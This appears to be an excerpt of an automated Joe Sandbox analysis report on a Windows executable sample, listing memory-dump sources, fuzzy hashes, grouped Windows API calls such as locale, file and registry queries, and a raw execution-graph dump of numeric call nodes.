                                                                                                      • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                                      • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                      • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                                      • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                      • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                                      • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                                      • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                      • API String ID: 4190037839-2401316094
                                                                                                      • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                      • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                      • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                      • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                      • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                      • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                      • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                      • String ID:
                                                                                                      • API String ID: 1694776339-0
                                                                                                      • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                      • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                      • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                      • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                                        • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                        • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                      • API String ID: 1044490935-665933166
                                                                                                      • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                      • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                                      • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                      • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
APIs
• RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
• LocalFree.KERNEL32(0073F830,00000000,00401AB4), ref: 00401A1B
• VirtualFree.KERNEL32(?,00000000,00008000,0073F830,00000000,00401AB4), ref: 00401A3A
• LocalFree.KERNEL32(00740830,?,00000000,00008000,0073F830,00000000,00401AB4), ref: 00401A79
• RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
• RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID:
• API String ID: 3782394904-0
• Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
• Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
• Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
• Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
• ExitProcess.KERNEL32 ref: 00403DE5
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000$9@
• API String ID: 1220098344-1503883590
• Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
• Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
• Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
• Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
• Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
• Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
• Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
• Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
APIs
• GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
• GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: CommandHandleLineModule
• String ID: U1hd.@$`&r
• API String ID: 2123368496-3853948702
• Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
• Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
• Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
• Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
APIs
• RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
• RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
• LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
• RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID:
• API String ID: 730355536-0
• Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
• Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
• Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
• Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
APIs
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: QueryValue
• String ID: )q@
• API String ID: 3660427363-2284170586
• Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
• Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
• Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
• Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
APIs
• Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
• Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
• GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
• GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ErrorLastSleep
• String ID:
• API String ID: 1458359878-0
• Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
• Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
• Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
• Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

Execution Graph

Execution Coverage: 15.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 69
KiUserCallbackDispatcher 56469->56493 56491 420858 20 API calls 56470->56491 56472 420730 56476 420752 56472->56476 56495 420070 12 API calls 56472->56495 56473->56472 56494 414728 KiUserCallbackDispatcher 56473->56494 56477 42067a 56477->56469 56492 420070 12 API calls 56477->56492 56490 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 56479->56490 56482 420697 56483 4206b3 MulDiv 56482->56483 56484 4206d6 56482->56484 56483->56484 56484->56469 56485 4206df MulDiv 56484->56485 56485->56469 56487 415b52 56486->56487 56496 414480 56487->56496 56489 415b6a 56489->56468 56490->56470 56491->56477 56492->56482 56493->56473 56494->56472 56495->56476 56497 41449a 56496->56497 56500 410658 56497->56500 56499 4144b0 56499->56489 56503 40dea4 56500->56503 56502 41065e 56502->56499 56504 40df06 56503->56504 56506 40deb7 56503->56506 56510 40df14 56504->56510 56508 40df14 19 API calls 56506->56508 56509 40dee1 56508->56509 56509->56502 56511 40df24 56510->56511 56513 40df3a 56511->56513 56522 40e29c 56511->56522 56538 40d7e0 56511->56538 56541 40e14c 56513->56541 56516 40d7e0 5 API calls 56517 40df42 56516->56517 56517->56516 56518 40dfae 56517->56518 56544 40dd60 56517->56544 56520 40e14c 5 API calls 56518->56520 56521 40df10 56520->56521 56521->56502 56558 40eb6c 56522->56558 56524 403778 4 API calls 56526 40e2d7 56524->56526 56525 40e38d 56527 40e3b7 56525->56527 56528 40e3a8 56525->56528 56526->56524 56526->56525 56621 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56526->56621 56622 40e280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56526->56622 56618 40bc24 56527->56618 56567 40e5c0 56528->56567 56533 40e3b5 56535 403400 4 API calls 56533->56535 56536 40e45c 56535->56536 56536->56511 56539 40ec08 5 API calls 56538->56539 56540 40d7ea 56539->56540 56540->56511 56655 40d6bc 56541->56655 56664 40e154 56544->56664 56547 40eb6c 5 API calls 56548 40dd9e 56547->56548 56549 40eb6c 5 API calls 56548->56549 56550 40dda9 
56549->56550 56551 40ddc4 56550->56551 56552 40ddbb 56550->56552 56557 40ddc1 56550->56557 56671 40dbd8 56551->56671 56674 40dcc8 19 API calls 56552->56674 56555 403420 4 API calls 56556 40de8f 56555->56556 56556->56517 56557->56555 56624 40d980 56558->56624 56561 4034e0 4 API calls 56562 40eb8f 56561->56562 56563 403744 4 API calls 56562->56563 56564 40eb96 56563->56564 56565 40d980 5 API calls 56564->56565 56566 40eba4 56565->56566 56566->56526 56568 40e5f6 56567->56568 56569 40e5ec 56567->56569 56571 40e711 56568->56571 56572 40e695 56568->56572 56573 40e6f6 56568->56573 56574 40e776 56568->56574 56575 40e638 56568->56575 56576 40e6d9 56568->56576 56577 40e67a 56568->56577 56578 40e6bb 56568->56578 56589 40e65c 56568->56589 56629 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56569->56629 56587 40d964 5 API calls 56571->56587 56637 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56572->56637 56642 40ea90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56573->56642 56582 40d964 5 API calls 56574->56582 56630 40d964 56575->56630 56640 40eba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56576->56640 56636 40da18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56577->56636 56639 40dfe4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56578->56639 56581 403400 4 API calls 56590 40e7eb 56581->56590 56591 40e77e 56582->56591 56588 40e719 56587->56588 56595 40e723 56588->56595 56596 40e71d 56588->56596 56589->56581 56590->56533 56597 40e782 56591->56597 56598 40e79b 56591->56598 56592 40e6e4 56641 409f38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56592->56641 56594 40e6a0 56638 40d670 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56594->56638 56643 40ec08 56595->56643 56603 40e721 56596->56603 56604 40e73c 56596->56604 56606 40ec08 5 API calls 56597->56606 56649 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56598->56649 56600 40e661 56635 40e0d8 
LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56600->56635 56601 40e644 56633 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56601->56633 56647 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56603->56647 56610 40ec08 5 API calls 56604->56610 56606->56589 56613 40e744 56610->56613 56611 40e64f 56634 40e46c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56611->56634 56646 40daa0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56613->56646 56615 40e766 56648 40e4d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56615->56648 56650 40bbd0 56618->56650 56621->56526 56622->56526 56623 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56623->56533 56627 40d98b 56624->56627 56625 40d9c5 56625->56561 56627->56625 56628 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56627->56628 56628->56627 56629->56568 56631 40ec08 5 API calls 56630->56631 56632 40d96e 56631->56632 56632->56600 56632->56601 56633->56611 56634->56589 56635->56589 56636->56589 56637->56594 56638->56589 56639->56589 56640->56592 56641->56589 56642->56589 56644 40d980 5 API calls 56643->56644 56645 40ec15 56644->56645 56645->56589 56646->56589 56647->56615 56648->56589 56649->56589 56651 40bbe2 56650->56651 56653 40bc07 56650->56653 56651->56653 56654 40bc84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56651->56654 56653->56533 56653->56623 56654->56653 56656 40ec08 5 API calls 56655->56656 56657 40d6c9 56656->56657 56658 40d6dc 56657->56658 56662 40ed0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56657->56662 56658->56517 56660 40d6d7 56663 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56660->56663 56662->56660 56663->56658 56665 40d964 5 API calls 56664->56665 56666 40e16b 56665->56666 56667 40ec08 5 API calls 56666->56667 56670 40dd93 56666->56670 56668 40e178 56667->56668 56668->56670 56675 40e0d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 
56668->56675 56670->56547 56676 40ad7c 19 API calls 56671->56676 56673 40dc00 56673->56557 56674->56557 56675->56670 56676->56673 50522 491444 50523 49147e 50522->50523 50524 49148a 50523->50524 50525 491480 50523->50525 50527 491499 50524->50527 50528 4914c2 50524->50528 50718 4090a0 MessageBeep 50525->50718 50530 447008 18 API calls 50527->50530 50533 4914fa 50528->50533 50534 4914d1 50528->50534 50529 403420 4 API calls 50531 491ad6 50529->50531 50532 4914a6 50530->50532 50535 403400 4 API calls 50531->50535 50719 406bb8 50532->50719 50543 491509 50533->50543 50544 491532 50533->50544 50537 447008 18 API calls 50534->50537 50538 491ade 50535->50538 50540 4914de 50537->50540 50727 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50540->50727 50546 447008 18 API calls 50543->50546 50549 49155a 50544->50549 50550 491541 50544->50550 50545 4914e9 50728 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50545->50728 50548 491516 50546->50548 50729 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50548->50729 50557 491569 50549->50557 50558 49158e 50549->50558 50731 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 50550->50731 50553 491521 50730 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50553->50730 50554 491549 50732 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50554->50732 50559 447008 18 API calls 50557->50559 50561 49159d 50558->50561 50562 4915c6 50558->50562 50560 491576 50559->50560 50733 4072b0 50560->50733 50565 447008 18 API calls 50561->50565 50568 4915fe 50562->50568 50569 4915d5 50562->50569 50564 49157e 50736 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50564->50736 50567 4915aa 50565->50567 50737 42c814 50567->50737 50576 49164a 50568->50576 50577 49160d 50568->50577 50571 447008 18 API calls 50569->50571 50573 4915e2 50571->50573 50747 407200 8 API calls 50573->50747 50582 491659 50576->50582 50583 491682 50576->50583 50579 447008 18 
API calls 50577->50579 50578 4915ed 50748 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50578->50748 50581 49161c 50579->50581 50584 447008 18 API calls 50581->50584 50585 447008 18 API calls 50582->50585 50589 4916ba 50583->50589 50590 491691 50583->50590 50586 49162d 50584->50586 50587 491666 50585->50587 50749 491148 8 API calls 50586->50749 50751 42c8b4 50587->50751 50600 4916c9 50589->50600 50601 4916f2 50589->50601 50593 447008 18 API calls 50590->50593 50591 491639 50750 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50591->50750 50596 49169e 50593->50596 50757 42c8dc 50596->50757 50597 491485 50597->50529 50603 447008 18 API calls 50600->50603 50606 49172a 50601->50606 50607 491701 50601->50607 50605 4916d6 50603->50605 50766 42c90c LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50605->50766 50614 491739 50606->50614 50615 491762 50606->50615 50609 447008 18 API calls 50607->50609 50611 49170e 50609->50611 50610 4916e1 50767 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50610->50767 50768 42c93c 50611->50768 50617 447008 18 API calls 50614->50617 50621 4917ae 50615->50621 50622 491771 50615->50622 50618 491746 50617->50618 50774 42c964 50618->50774 50627 4917bd 50621->50627 50628 491800 50621->50628 50624 447008 18 API calls 50622->50624 50626 491780 50624->50626 50629 447008 18 API calls 50626->50629 50630 447008 18 API calls 50627->50630 50634 49180f 50628->50634 50635 491873 50628->50635 50631 491791 50629->50631 50632 4917d0 50630->50632 50780 42c508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50631->50780 50636 447008 18 API calls 50632->50636 50638 447008 18 API calls 50634->50638 50643 4918b2 50635->50643 50644 491882 50635->50644 50639 4917e1 50636->50639 50637 49179d 50781 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50637->50781 50641 49181c 50638->50641 50782 491340 12 API calls 50639->50782 50710 42c618 7 API calls 50641->50710 
